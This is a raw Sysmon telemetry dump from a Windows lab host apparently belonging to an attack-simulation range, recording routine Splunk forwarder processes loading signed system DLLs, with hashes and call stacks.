13:02:49.041{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098245Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-A252-6294-0500-000000005502}4161908C:\Windows\system32\csrss.exe{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000098244Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.041{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000098243Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.042{326FD73D-C079-6294-2B0B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000098347Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:50.322{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6D36BD852AA2E70BC7CB5104C83C001,SHA256=C3F22F053A3A6D2F45A35E664D99E94BD3323D5373B5572908BB120213057CE8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000098400Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.525{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=670E4DAEC17A9B56A385E3158D264EFB,SHA256=53B4B4EE867611BEC9F5DFD4C5E7F4A2B23995EF907F163B1F6B13D48C4BA077,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000098399Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.416{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 10341000x800000000000000098398Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.416{326FD73D-C07B-6294-2D0B-000000005502}52366916C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000098397Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.416{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x800000000000000098396Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.416{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 734700x800000000000000098395Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.244{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x800000000000000098394Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:02:51.244{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x800000000000000098393Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.244{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x800000000000000098392Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.244{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x800000000000000098391Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.244{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® 
Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x800000000000000098390Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.244{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x800000000000000098389Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.244{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x800000000000000098388Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.244{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 
734700x800000000000000098387Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x800000000000000098386Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x800000000000000098385Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x800000000000000098384Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x800000000000000098383Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x800000000000000098382Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x800000000000000098381Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft 
CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x800000000000000098380Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000098379Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x800000000000000098378Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 
734700x800000000000000098377Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x800000000000000098376Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x800000000000000098375Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x800000000000000098374Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x800000000000000098373Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x800000000000000098372Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x800000000000000098371Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 
734700x800000000000000098370Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x800000000000000098369Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x800000000000000098368Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x800000000000000098367Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating 
SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x800000000000000098366Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x800000000000000098365Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x800000000000000098364Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:51.229{326FD73D-C07B-6294-2D0B-000000005502}5236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x800000000000000098363Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
